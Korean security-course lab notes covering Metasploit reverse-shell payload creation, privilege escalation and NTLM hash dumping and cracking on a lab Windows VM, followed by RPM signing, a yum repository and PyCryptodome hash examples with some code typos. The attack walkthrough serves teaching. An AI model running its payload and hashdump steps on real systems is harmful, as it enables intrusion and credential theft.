정보보안 과정 Day89 : NTLM 해시 크랙 / Yum repo 서명/검증 실습 / 해시 함수 테스트

 

 

 

 

 

 

[목차]

 

 

1.LM, NTLM 해시 크랙하기

2. 리눅스 패키지 서명/검증 작업 - Yum Repository

3. 메일의 전자 서명/암호화 실습

4. 간단한 해시 함수 테스트

 

 

 

---

 

 

 

 

[LM, NTLM 해시 크랙하기]

 

 

 

NTLM (NT LAN Manager)

 

NTLM 은 윈도우에서 제공하고 있는 인증 프로토콜 중 하나.

Challenge-Response(도전-응답) 라고 불리는 인증 프로토콜 방식을 사용.

최근에는 거의 쓰이지 않고 있으며 MS 에서도 사용을 권장하지 않고 있음.

하지만 아직 로컬 환경에서 쓰이는 경우가 있으며

SMB 프로토콜에도 하위호환성을 위해 내장되어 있음

 

LM -> NTLMv1 -> NTLMv2

 

 

 

 

 

[참고]

다음 사이트를 사용하여 LM, NTLM 해시에 대해 study 한다.

 

NT LAN Manager

https://en.wikipedia.org/wiki/NT_LAN_Manager

 

NTLM Algorithm

https://openwall.info/wiki/john/NTLM

 

LM, NTLM, Net-NTLMv2, oh my!

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4

 

Ntlm() Encrypt & Decrypt

https://md5decrypt.net/en/Ntlm/

 

 

 

 

■ 사용 시스템

kali

win2008

 

 

 

■ 작업 시나리오

 

192.168.10.50 192.168.10.201

---- kali ---- ---- win2008 ----

reverse_resource.rc

reverse_test.exe -----> reverse_test.exe

 

* getsystem(권한상승)

* NTLM hash crack

 

 

 

[실습] 윈도우 시스템을 공격하고 권한을 상승하여, 암호 크랙하기

 

(kali)

 

(준비 사항)

# msfdb init

# systemctl restart postgresql

# systemctl enable postgresql

 

 

 

① reverse_resource.rc 파일 생성

# cd /test

# cat << EOF > reverse_resource.rc

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.10.60

set ExitSession false

exploit -j -z

EOF

 

 

 

② reverse_test.exe

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.60 \

-f exe -o /var/www/html/reverse_test.exe

 

# file /var/www/html/reverse*

 

 

 

③ 웹서버 기동

# systemctl restart apache2

# systemctl status apache2

 

 

 

④ 리스너 기동

# cd /test

# msfconsole -r reverse_resource.rc

msf6 exploit(multi/handler) > jobs

msf6 exploit(multi/handler) > sessions

 

 

 

⑤ (win2008) 사용자 암호를 쉽게 설정 설정

lusrmgr.msc

- ID/PASS: administrator/1

- ID/PASS: soldesk/2

- ID/PASS: user1/1

- ID/PASS: user2/2

 

ncpa.cpl

윈도우 ip = 192.168.10.201

게이트웨이 = 192.168.10.2

 

 

 

⑥ 악성코드 다운로드

IE: http://192.168.10.60/reverse_test.exe

바탕화면에 파일을 다운로드 받는다.

 

 

 

⑦ 악성코드 실행

[참고] 악성코드 유무 확인: virustotal.com

 

바탕화면에 있는 reverse_test.exe 파일을 클릭한다.

ClamAV 기억하기!

 

 

 

(kali)

 

⑧ kali 작업

msf6 exploit(multi/handler) > jobs

msf6 exploit(multi/handler) > sessions

resource (reverse_resource.rc)> exploit -j -z [*] Exploit running as background job 0. [*] Exploit completed, but no session was created.   [*] Started reverse TCP handler on 192.168.10.60:4444 msf5 exploit(multi/handler) > [*] Sending stage (180291 bytes) to 192.168.10.201 [*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.201:1053) at 2020-03-15 11:43:02 +0900

 

<ENTER> msf5 exploit(multi/handler) > sessions   Active sessions ===============   Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WINDOW2008\Administrator @ WINDOW2008 192.168.10.60:4444 -> 192.168.10.201:1053 (192.168.10.201)   msf5 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1...   meterpreter > help -> 출력 화면 생략   meterpreter > sysinfo Computer : WINDOW2008 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : ko_KR Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows   meterpreter > getsystem (윈도우는 system이 최고 권한) ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > use post/windows/gather/hashdump msf5 post(windows/gather/hashdump) > set session 1 session => 1 msf5 post(windows/gather/hashdump) > run (해쉬값을 얻어옴)   [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 0dc8086938a003b73bbb85b6b4f2530b... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints...   No users with password hints on this system   [*] Dumping password hashes...     Administrator:500:aad3b435b51404eeaad3b435b51404ee:70427e539c0037169d8738cad05c0cf6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: soldesk:1002:aad3b435b51404eeaad3b435b51404ee:70427e539c0037169d8738cad05c0cf6::: user1:1003:aad3b435b51404eeaad3b435b51404ee:f9e37e83b83c47a93c2f09f66408631b::: user2:1004:aad3b435b51404eeaad3b435b51404ee:c549ee84021e5e8372e10cedeafd02a8:::     [*] Post module execution completed   msf5 post(windows/gather/hashdump) > use auxiliary/analyze/jtr_windows_fast msf5 auxiliary(analyze/jtr_crack_fast) > run   * 에러뜸 *   에러 메시지 [-] Auxiliary failed: NoMethodError undefined method `jtr_format' for nil:NilClass [-] Call stack: [-] /usr/share/metasploit-framework/modules/auxiliary/analyze/crack_windows.rb:303:in `block in hash_file' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.4/lib/active_record/relation/delegation.rb:71:in `each' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-5.2.4.4/lib/active_record/relation/delegation.rb:71:in `each' [-] /usr/share/metasploit-framework/modules/auxiliary/analyze/crack_windows.rb:301:in `hash_file' [-] /usr/share/metasploit-framework/modules/auxiliary/analyze/crack_windows.rb:207:in `run'       -> 출력 내용 생략 -> 인터넷 사이트를 사용하는 방법: user1 사용자의 NTLM Hash를 crack 하는 사이트에서 작업 https://crackstation.net/ https://md5decrypt.net/en/Ntlm/

 

 

[참고] Metasploit Framework 업데이트

# apt-get -y install metasploit-framework

 

 

 

---

 

 

 

 

[리눅스 패키지 서명/검증 작업 - Yum Repository]

 

 

 

■ 사용시스템

linux200

 

 

■ 작업 시나리오

리눅스 시스템에서 사용할 수 있는 패키지를 생성하고

생성된 패키지에 GPG 키를 사용하여 사인(sign) 하고

Yum repository 구성하여 패키지와 GPG 키를 제공한 상태에서

클라이언트 시스템에서 패키지 다운로드/검증하고 설치되는 과정을 실습해 보자.

 

 

■ 선수지식

PGP, GPG(GNU PG)

gpg CMD 사용법 (파일 암호화 / 서명 확인 / 통신 암호화 용도로 쓰임)

- 구글 검색: "gpg cheet sheet"

- https://gist.github.com/turingbirds/3df43f1920a98010667a

 

 

[참고] How to Create RPM for Your Own Script in CentOS/RedHat

https://tecadmin.net/create-rpm-of-your-own-script-in-centosredhat/

 

[참고] HOWTO: GPG sign and verify RPM packages and yum repositories

https://blog.packagecloud.io/eng/2014/11/24/howto-gpg-sign-verify-rpm-packages-yum-repositories/

 

 

 

(필요성) 패키지화 + 패키지 sign ?

 

소스코드로 설치한 프로그램 --- 패키지화 ---> source.rpm

(EX: /usr/local/apache2) ----------------> (EX: apache2.rpm)

source.rpm 파일을 쉽게 제공하기 위한 YUM repository 구성

패키지/배포파일의 무결성을 점검하는 대표적인 방법

* GPG Key 사용하는 방법

* Hash(EX: md5cksum) 알고리즘을 사용하는 방법

- # md5sum /bin/ls

 

 

 

[실습] 패키지 제작 + 패키지 sign + YUM Repository 구성 + 테스트

 

 

(주의) Web Application Firewall 내리기

# cd /etc/httpd/conf.d

# mv mod_security.conf mod_security.conf.old

# systemctl restart httpd

 

 

① Step 1 – Install Required Packages

# yum -y install rpm-build rpmdevtools rpm-sign

-> 출력 내용 생략

 

 

② Step 2 – Create Directory Structure

# rpmdev-setuptree (# mkdir -p ~/rpmbuild/{BUILD,RPMS,SOURCES,SPECS,SRPMS,tmp})

# cd ~/rpmbuild

# tree -C (# yum -y install tree)

 

 

③ Step 3 – Create rpmmacro File

# vi ~/.rpmmacros

%packager 타쿠대디   %_topdir %(echo $HOME)/rpmbuild   %_smp_mflags %( \ [ -z "$RPM_BUILD_NCPUS" ] \\\ && RPM_BUILD_NCPUS="`/usr/bin/nproc 2>/dev/null || \\\ /usr/bin/getconf _NPROCESSORS_ONLN`"; \\\ if [ "$RPM_BUILD_NCPUS" -gt 16 ]; then \\\ echo "-j16"; \\\ elif [ "$RPM_BUILD_NCPUS" -gt 3 ]; then \\\ echo "-j$RPM_BUILD_NCPUS"; \\\ else \\\ echo "-j3"; \\\ fi )   %__arch_install_post \ [ "%{buildarch}" = "noarch" ] || QA_CHECK_RPATHS=1 ; \ case "${QA_CHECK_RPATHS:-}" in [1yY]*) /usr/lib/rpm/check-rpaths ;; esac \ /usr/lib/rpm/check-buildroot

 

 

④ Step 4 – Copy Files under SOURCES Directory

# mkdir -p ~/rpmbuild/SOURCES/hello-1.0

# cd ~/rpmbuild/SOURCES

# vi hello-1.0/hello.sh

#!/bin/bash

echo 'This is a test.'
echo

echo ' ________________________'
echo '/                        \'
echo '|                        |'
echo '| 야 !! 공부좀 해라!!!   |'
echo '|                        |'
echo '\________________________/'
echo '  \'
echo '   \'
echo '     (__)'
echo '     (oo)______'
echo '     (__)      )\'
echo '        ||---||  *'
echo '        ||   ||'
echo

 

 

# tar cvzf hello-1.0-1.tar.gz hello-1.0

hello-1.0/ hello-1.0/hello.sh

⑤ Step 5 – Create SPEC File

# vi ~/rpmbuild/SPECS/hello.spec

%define name hello %define version 1.0 %define release 1   Name: hello Version: 1.0 Release: 1 Summary: Hello Group: CentOS License: GPL URL: http://www.example.com Source0: %{name}-%{version}-%{release}.tar.gz BuildRoot: /var/tmp/%{name}-buildroot   %description Installs /root/bin/hello.sh   %prep %setup -q -n %{name}-%{version}   %build   %install rm -rf $RPM_BUILD_ROOT mkdir -p $RPM_BUILD_ROOT/root/bin install -m 755 hello.sh $RPM_BUILD_ROOT/root/bin/hello.sh   %clean rm -rf $RPM_BUILD_ROOT   %files %defattr(-,root,root,-) /root/bin/hello.sh   %changelog

 

 

⑥ Step 6 – Build RPM

# cd ~/rpmbuild

# rpmbuild -ba SPECS/hello.spec

-> 출력 내용 생략

 

# tree -C

. ├── BUILD │ └── hello-1.0 │ ├── debugfiles.list │ ├── debuglinks.list │ ├── debugsources.list │ ├── elfbins.list │ └── hello.sh ├── BUILDROOT ├── RPMS │ └── x86_64 │ ├── hello-1.0-1.x86_64.rpm │ └── hello-debuginfo-1.0-1.x86_64.rpm ├── SOURCES │ ├── hello-1.0 │ │ └── hello.sh │ └── hello-1.0-1.tar.gz ├── SPECS │ └── hello.spec └── SRPMS └── hello-1.0-1.src.rpm   9 directories, 11 files

⑦ 테스트

# cd RPMS/x86_64

# rpm -Uvh hello-1.0-1.x86_64.rpm

Preparing... ################################# [100%] Updating / installing... 1:hello-1.0-1 ################################# [100%]

 

 

# rpm -ql hello-1.0-1

/root/bin/hello.sh

 

 

# rpm -qi hello-1.0-1

Name : hello Version : 1.0 Release : 1 Architecture: x86_64 Install Date: Wed 12 Feb 2020 02:17:05 PM KST Group : CentOS Size : 394 License : GPL Signature : (none) Source RPM : hello-1.0-1.src.rpm Build Date : Wed 12 Feb 2020 01:17:46 PM KST Build Host : linux200.example.com Relocations : (not relocatable) URL : http://www.example.com Summary : Hello Description : Installs /root/bin/hello.sh

 

 

# hello.sh

-> 출력 내용 생략

 

# rpm -e hello-1.0-1

#

 

 

⑧ GPG Key 생성과 패키지 sign

# cd

# gpg --gen-key

gpg (GnuPG) 1.4.5; Copyright (C) 2006 Free Software Foundation, Inc. This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. See the file COPYING for details.   gpg: directory `/root/.gnupg' created gpg: new configuration file `/root/.gnupg/gpg.conf' created gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run gpg: keyring `/root/.gnupg/secring.gpg' created gpg: keyring `/root/.gnupg/pubring.gpg' created Please select what kind of key you want: (1) DSA and Elgamal (default) (2) DSA (sign only) (5) RSA (sign only) Your selection? <ENTER> DSA keypair will have 1024 bits. ELG-E keys may be between 1024 and 4096 bits long. What keysize do you want? (2048) <ENTER> Please specify how long the key should be valid. 0 = key does not expire <n> = key expires in n days <n>w = key expires in n weeks <n>m = key expires in n months <n>y = key expires in n years Key is valid for? (0) <ENTER> Key does not expire at all Is this correct? (y/N) y   You need a user ID to identify your key; the software constructs the user ID from the Real Name, Comment and Email Address in this form: "Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"   Real name: takudaddy Email address: takudaddy@naver.com Comment: You selected this USER-ID: "takudaddy <takudaddy@naver.com>"   Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o You need a Passphrase to protect your secret key.   Passphrase: testing123 Repeat passphrase: testing123   We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. gpg: /root/.gnupg/trustdb.gpg: trustdb created gpg: key A1D27855 marked as ultimately trusted public and secret key created and signed.   gpg: checking the trustdb gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u pub 2048R/A1D27855 2021-01-13 Key fingerprint = 0E8B 22D4 5480 5BAF A502 5C3F 1BBE 7183 A1D2 7855 uid takudaddy <takudaddy@naver.com> sub 2048R/B107D059 2021-01-13

 

-> Key ID 확인: A1D27855

 

⑨ ~/RPM-GPG-KEY-test 파일 생성

# gpg -a -o ~/RPM-GPG-KEY-test --export A1D27855

# ls RPM*

RPM-GPG-KEY-test

 

 

# cat RPM-GPG-KEY-test

-----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v2.0.22 (GNU/Linux)   mQENBF/+ZwcBCACnz8D8HNM4vP/JvhKJelUXj7bw5vhz7x/WROoYo1oiJeabXPnT F5UQ/TBfQhHCUq9zRS16LZ6ROJbMkBRQPhoiL6MFhlf4GSrqwckWjHfjGOIUnI8q AhI4jPS2hWDfdUs2OMjh+Fl97iMX4oRSsh+R9/UA0lY0DleqimqZSX8Gb0ygg8si DINXvgqxn7BQFPRO+kIcPUqRrkCdkw2iougxCxYBqDmrYf0+z1bgvubKj8tOHHrJ WPSEoupQAqMdwIGvZ1mUmHH7UkSDHP9QhVHUwA9pslck3fnzUGQ4n6pxu/ZC0GtT IS7cmCTHKJkr/GustzvK2/oGLbrd0R0Ww0ibABEBAAG0H3Rha3VkYWRkeSA8dGFr dWRhZGR5QG5hdmVyLmNvbT6JATkEEwECACMFAl/+ZwcCGwMHCwkIBwMCAQYVCAIJ CgsEFgIDAQIeAQIXgAAKCRAbvnGDodJ4VQhuCACN+h7Tg8Go7gvoCG6p+0n8Yfv7 qNy5PTorcBHJ3b7a/HVhJPjSXbFwAYQM2xldjJZXWR96zvp55InD0LQahvV12wjV NuuNYiYpLGHB7FbHrFi3hCAZ5FFKRCfEO9j7gXktj9gnjuB1ZHYxi/+y3ffK8iFP SklbKg9yWYtIY30tXYO4ARXjR/kDcfbT/RTE47k+tqJNZa/1PvBee8Zj2w1lmynl UxVaMM5HjJ9lvZYPjUcWrSBrGUYzDSAuhQPKextBOaGNcvoaDZDgX+ugwjk2h5mT Bm7x01BCX0nStw6TarikE2Juft38KhRB4DFWPTtroyVKAn/h7IJoR1n2LBKouQEN BF/+ZwcBCADdA8J4mfk+ClSYUs4HsRvNcxb3aNDhfSGWB3EeiLu8cyev9v6IJV+W tWlMAAcGIQTkLwlEsxV2tQeCauZu1UZxj3hs7iMWjymR1hvuZVHvCYwoJcY6hErH UwS/FF90p3ha3jvHaAghOfsEeY9IReRVuULVomenr5kiAlQWP8A1sEHkwc4D31eO nQkkrsu3+g9PFN/zLwNlBmW/2DzKUZr8wNjw7S695g8J6Mpg+Bi/oHsKi/j369mo t/TgR1+DC5vojJwDwfg4+FO1OTRmZ7YxL9yj/ZkwLxXXviQaGC7yAQfZROgiLXCF BLJtHH9QGRPU1S7MxjnNqmqRpleXbfgVABEBAAGJAR8EGAECAAkFAl/+ZwcCGwwA CgkQG75xg6HSeFU9gQf/UlWWATAB+/YaU4hdQqALz9ouWoO+I6QrNjTIy1Sq696I 9Ji+sTsvycPY2SSoZgc541r1Rw9FPMh/YrM4ofB7z9wYhiRUYujp4r7s3Zf7m1c+ dNUChoLK0DjDlYBIaVSOkX1y4O8MaEGvHGD6ehfu0QlOgPQ8PtP/lq88eDwcgQYQ bCArj3DLma5O/yoXBIoN7MgUnsLyJLfDtwz8gJoRCLnGQclZLlHOnEuuD97Tf2yE 94Jwn/ulE99qn3BkCLaJeWr4pSQNvEdkpdA5muwFDBvadsCjFrvvvTiz8Hd//qXV ZHhVHRoCD6EM/na0rhR6kL2T/kk85f8rXExlr73vPw== =tPwJ -----END PGP PUBLIC KEY BLOCK-----

 

 

⑧ ~/.rpmmacros 파일 생성

# vi ~/.rpmmacros

%_gpg_name A1D27855   %packager 타쿠대디   %_topdir %(echo $HOME)/rpmbuild   - 출력 내용 생략-

 

 

 

⑨ 패키지 sign

 

패키지 사인하기

# rpmsign --addsign PKG.rpm

or

# rpm --addsign PKG.rpm

 

패키지 재 사인하기

# rpm --resign PKG.rpm

 

 

# rpmsign --addsign rpmbuild/RPMS/x86_64/hello-1.0-1.x86_64.rpm

Enter pass phrase: testing123 Pass phrase is good. rpmbuild/RPMS/x86_64/hello-1.0-1.x86_64.rpm:

■ $HOME/RPM-GPG-KEY-test

■ /usr/src/redhat/RPMS/x86_64/hello-1.0-1.i386.rpm (sign)

 

 

 

⑩ 배포 서버 구성(YUM Repository)

 

# mkdir /var/www/html/packages

# cp ~/rpmbuild/RPMS/x86_64/hello-1.0-1.*.rpm /var/www/html/packages

# cp ~/RPM-GPG-KEY-test /var/www/html/packages

# tree /var/www/html

-> 정보 생략

 

# yum -y install createrepo

# createrepo /var/www/html/packages

 

1/1 - hello-1.0-1.i386.rpm   Saving Primary metadata Saving file lists metadata Saving other metadata

 

 

# tree /var/www/html

-> 정보 생략

# systemctl restart httpd (# service httpd restart)

 

 

 

⑪ hello.repo 파일 생성

# vi /etc/yum.repos.d/hello.repo

[hello] name=hello description=Test Yum Repository baseurl=http://192.168.10.200/packages enabled=1 gpgcheck=1 gpgkey=http://192.168.10.200/packages/RPM-GPG-KEY-test

 

192.168.10.200 : linux200 서버의 IP

-> Yum repository Server의 IP를 지정한다.

 

 

⑫ 설치 확인

# yum -y install hello

Loaded plugins: fastestmirror, langpacks Loading mirror speeds from cached hostfile * base: mirror.kakao.com * extras: mirror.kakao.com * updates: mirror.kakao.com hello | 2.9 kB 00:00:00 hello/primary_db | 1.6 kB 00:00:00 Resolving Dependencies --> Running transaction check ---> Package hello.x86_64 0:1.0-1 will be installed --> Finished Dependency Resolution   Dependencies Resolved   ========================================================================================== Package Arch Version Repository Size ========================================================================================== Installing: hello x86_64 1.0-1 hello 2.8 k   Transaction Summary ========================================================================================== Install 1 Package   Total download size: 2.8 k Installed size: 394   Downloading packages: warning: /var/cache/yum/x86_64/7/hello/packages/hello-1.0-1.x86_64.rpm: Header V4 RSA/SHA1 Signature, key ID a1d27855: NOKEY Public key for hello-1.0-1.x86_64.rpm is not installed hello-1.0-1.x86_64.rpm | 2.8 kB 00:00 Retrieving key from http://192.168.10.200/packages/RPM-GPG-KEY-test Importing GPG key 0xA1D27855: Userid : "takudaddy <takudaddy@naver.com>" Fingerprint: 0e8b 22d4 5480 5baf a502 5c3f 1bbe 7183 a1d2 7855 From : http://192.168.10.200/packages/RPM-GPG-KEY-test   Running transaction check Running transaction test Transaction test succeeded Running transaction Installing : hello-1.0-1.x86_64 1/1 Verifying : hello-1.0-1.x86_64 1/1   Installed: hello.x86_64 0:1.0-1   Complete!

# hello.sh

 ________________________
/                        \
|                        |
| 야 !! 공부좀 해라!!!   |
|                        |
\________________________/
  \
   \
     (__)
     (oo)______
     (__)      )\
        ||---||  *
        ||   ||

 

 

(복원) hello.repo 파일 복원

# vi /etc/yum.repos.d/hello.repo

[hello] name=hello description=Test Yum Repository baseurl=http://172.16.9.252/packages enabled=0 gpgcheck=1 gpgkey=http://172.16.9.252/packages/RPM-GPG-KEY-test

 

아니면 아래 커맨드로 disable

# yum replolist

 # yum-config-manager --disable hello

 

 

[참고] spec 파일 만들기

■ spec 파일을 만드는 과정이 가장 중요하면 다음과 같은 사이트를 참고 하여 적당한 spec 파일을 만들어 보자.

http://www.cubrid.com/zbxe/bbs_developer_tutorial/149970

http://kthan.tistory.com/entry/리눅스Linux-RPM-만드는-방법과-spec파일-작성법

http://onecellboy.tistory.com/267

 

 

---

 

 

 

[메일의 전자 서명/암호화 실습]

 

 

thunderbird 버전 업데이트로 인한 실습 실패

 

 

 

---

 

 

 

[간단한 해시 함수 테스트]

 

 

해시 함수(Hash Function)

암호화 해시 함수는 임의의 이진 문자열을 입력으로 사용하여

의의 길이 출력(digest or hash value)을 생성한다.

다이제스트해서 원래 입력 데이터를 파생시키는 것은 실제로 불가능.

 

즉, 암호화 해시 함수는 단방향(pre-image resistance)이다.

한 메시지의 요약이 주어지면 동일한 요약(weak collision resistance)으로

다른 메세지(second pre-image)를 찾는 것도 실제로 불가능하다.

마지막으로, 동일한 다이제스트(strong collision resistenace)를 갖는

두개의 임의의 메시지를 찾는 것은 불가능하다.

 

해시 알고리즘에 관계없이, n 비트 길이의 다이제스트 n/2 비트(birthday attack)로

키를 맞춘 대칭 암호화 알고리즘 만큼 안전하다.

해시 함수는 무결성 검사로 간단하게 사용할 수 있다.

공개 키 알고리즘과 함께 디지털 서명을 구현할 수 있다.

 

 

 

■ HASH_Test1.py

from Crypto.Hash import SHA256 as SHA   # 해시 객체를 만들면서 data는 넣는다. hash = SHA.new(data=b'Some data') print('Original1:', hash.hexdigest())   # 해시 객체를 만든 후에 data는 넣는다. hash = SHA.new() print('Original2:', hash.hexdigest()) hash.update(b'Some data') print('Original3:', hash.hexdigest())

Original1: 1fe638b478f8f0b2c2aab3dbfd3f05d6dfe2191cd7b4482241fe58567e37aef6 Original2: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Original3: 1fe638b478f8f0b2c2aab3dbfd3f05d6dfe2191cd7b4482241fe58567e37aef6

 

 

■ HASH_Test2.py

from Crypto.Hash import SHA256 as SHA   # 해시 객체를 만들고, b'First', b'Second' 각각 업데이트 hash = SHA.new() print('Original :', hash.hexdigest())   hash.update(b'First') print('First :', hash.hexdigest()) hash.update(b'Second') print('Second :', hash.hexdigest())   # 해시 객체를 만들고, b'FirstSecond' 업데이트 hash2 = SHA.new(b'FirstSecond') print('1st2nd :', hash2.hexdigest())

Original : e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 First : a151ceb1711aad529a7704248f03333990022ebbfa07a7f04c004d70c167919f Second : cad4c5623efc0ae67dbe8274e7ffc184ca91df37a8e844624240f8eef1300ce7 1st2nd : cad4c5623efc0ae67dbe8274e7ffc184ca91df37a8e844624240f8eef1300ce7

 

 

 

 

[실습] SHA3-224, SHA3-256, SHA3-384, SHA3-512 차이점을 확인

 

■ SHA3-224.py

from Crypto.Hash import SHA3_224   hash = SHA3_224.new() hash.update(b'Some data') print(hash.hexdigest())

 

■ SHA3-256

from Crypto.Hash import SHA3_224

hash256 = SAH3_224.new()

 

 

■ SHA3-384

from Crypto.Hash import SHA3_384

hash384 = SHA3_384.new()

 

 

■ SHA3-512

from Crypto.Hash import SHA3_512

hash384 = SHA3_512.new()

 

 

■ SHA3-224-256-384-512.py

from Crypto.Hash import SHA3_224 from Crypto.Hash import SHA3_256 from Crypto.Hash import SHA3_384 from Crypto.Hash import SHA3_512   # SHA3_224 hash224 = SHA3_224.new() hash224.update(b'Some data') print('hash224:', hash224.hexdigest())   # SHA3_256 hash256 = SHA3_256.new() hash256.update(b'Some data') print('hash256:', hash256.hexdigest())   # SHA3_384 hash384 = SHA3_384.new() hash384.update(b'Some data') print('hash384:', hash384.hexdigest())   # SHA3_512 hash512 = SHA3_512.new() hash512.update(b'Some data') print('hash512:', hash512.hexdigest())

hash224: 954ad9fc5a521a0a78fba2e69e3bf14edf7386f3be2e6d354fd7aac8 hash256: 86b8648658d163a47203c7101c327eb8434d741aa4b14b1b3ff9c08ba723bcd1 hash384: 367e70c5e9bc3e4ad8ba30b163720965016a50dacc651621d09de0bde3c63a85a9dcdf790cf33c21f3539412d2b55c82 hash512: 71244a0cc9d38321553682b6c9cfcf30d7fee2d0e4710326c2f739189d7622a6cca3f776c532009fd1fed163a79165ada43a1a3b424063ec4f3fccc6fd1c1f66

SHA3-224,384,256,512 차이점이 무엇인가?

: 해시값의 길이

 

 

 

[실습]

BLAKE2s, BLAKE2b

 

 

■ BLAKE2s(32 비트 플랫폼 전용)

https://pycryptodome.readthedocs.io/en/latest/src/hash/blake2s.html

BLAKE2s는 SHA-3 후보 중 하나인 BLAKE의 최적화된 변형으로, 이를 NIST 해시 경쟁의 최종 라운드로 만들었다. (RFC 7693)

이 알고리즘은 32비트 단어를 사용하므로 32비트 플랫폼에 가장 잘 동작한다.

다이제스트 크기는 8~256 비트이다.

 

 

■ BLAKE2b(64 비트 플랫폼 전용)

https://pycryptodome.readthedocs.io/en/latest/src/hash/blake2b.html

BLAKE2b는 SHA-3 후보 중 하나인 BLAKE의 최적화된 변형으로, 이를 NIST 해시 경쟁의 최종 라운드로 만들었다. (RFC 7693)

이 알고리즘은 64비트 단어를 사용하므로 64비트 플랫폼에 가장 잘 동작한다.

다이제스트 크기는 8~512 비트이다.

 

from Crypto.Hash import BLAKE2s   # 해시 객체 생성, 기본값 hash = BLAKE2s.new() print('Original :', hash.hexdigest())   # 해시 객체 생성, digest bit: 256 (기본값임을 알 수 있음) hash = BLAKE2s.new(digest_bits=256) print('BLAKE2s-256:', hash.hexdigest())   # 해시 객체 생성, digest bit: 128 hash = BLAKE2s.new(digest_bits=128) print('BLAKE2s-128:', hash.hexdigest())

Original : 69217a3079908094e11121d042354a7c1f55b6482ca1a51e1b250dfd1ed0eef9 BLAKE2s-256: 69217a3079908094e11121d042354a7c1f55b6482ca1a51e1b250dfd1ed0eef9 BLAKE2s-128: 64550d6ffe2c0a01a14aba1eade0200c

 

 

■ BLAKE2s는 비밀키로 초기화 될 때 암호화 MAC으로 작동 할 수 있다.

from Crypto.Hash import BLAKE2s   mac = BLAKE2s.new(digest_bits=128, key=b'secret') mac.update(b'Some data') print(mac.hexdigest())

3fb47e623d0031b97f5fa77b63add3c5

 

■ BLAKE2s versus BLAKE2b

from Crypto.Hash import BLAKE2s from Crypto.Hash import BLAKE2b   mac = BLAKE2s.new(digest_bits=128, key=b'secret') mac.update(b'Some data') print('BLAKE2s :', mac.hexdigest())   mac = BLAKE2b.new(digest_bits=128, key=b'secret') mac.update(b'Some data') print('BLAKE2b :', mac.hexdigest())

BLAKE2s : 3fb47e623d0031b97f5fa77b63add3c5 BLAKE2b : 1226fda19db309f567d016ef58f1f309

 

 

 

[참고] 해시 값만 가지고 어떻게 알고리즘을 유추할 수 있을까?

https://hashcat.net/wiki/doku.php?id=example_hashes

 

해시 알고리즘에 따라서 해시 값(hash value, digest)이 틀리기 때문에 일부 유추할 수 있는 가능성이 있다.

다음 사이트에서 "Generic Hash types" 부분을 확인한다.

https://hashcat.net/wiki/doku.php?id=example_hashes